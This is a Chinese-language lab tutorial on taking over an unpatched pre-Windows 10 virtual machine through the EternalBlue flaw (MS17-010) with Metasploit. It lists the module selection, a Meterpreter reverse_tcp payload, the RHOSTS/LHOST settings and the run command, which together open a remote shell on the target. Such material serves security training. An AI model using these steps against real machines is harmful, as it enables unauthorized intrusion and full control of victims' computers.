一,安装靶机
需要在VMware中安装Windows10以下的系统作为靶机
二,使用模块
kali切换至root用户
sudo su
输入msfconsole打开msf6
msfconsole
搜索永恒之蓝(编号ms17_010)
search ms17_010
exploit 表示利用脚本攻击
auxiliary 表示检测漏洞的存在
三,设置必选项
选择模块(代号)
use 0
或者 (全称)
use exploit/windows........
查看设置
show options或者options
其中payload表示攻击载荷,攻击流程中起核心作用。一般都是默认的windows/x64/meterpreter/reverse_tcp,如果不是则要设置
set payload windows/x64/meterpreter/reverse_tcp
RHOSTS ,靶机的ip地址
LHOST,监听的地址,即kali的ip地址。输入ifconfig可以查看,其中eth0表示以太网
LPORT,tcp逻辑端口0---65535,只要未被占用就可以随意设置
四,运行模块
攻击机(kali)与攻击对象(Windows10以下)必须处于同一个局域网内
打开准备好的Window系统,打开命令行输入ipconfig查看本机的ip地址
利用攻击机ping靶机的ip地址: ping 192.168.32.129 (一定要是自己靶机的地址)
如果靶机ip地址能ping通则设置为RHOSTS
set RHOSTS 192.168.32.129
然后输入run命令,等待payload打出去获取到靶机权限
出现meterpreter表示得到靶机后渗透权限,即攻击成功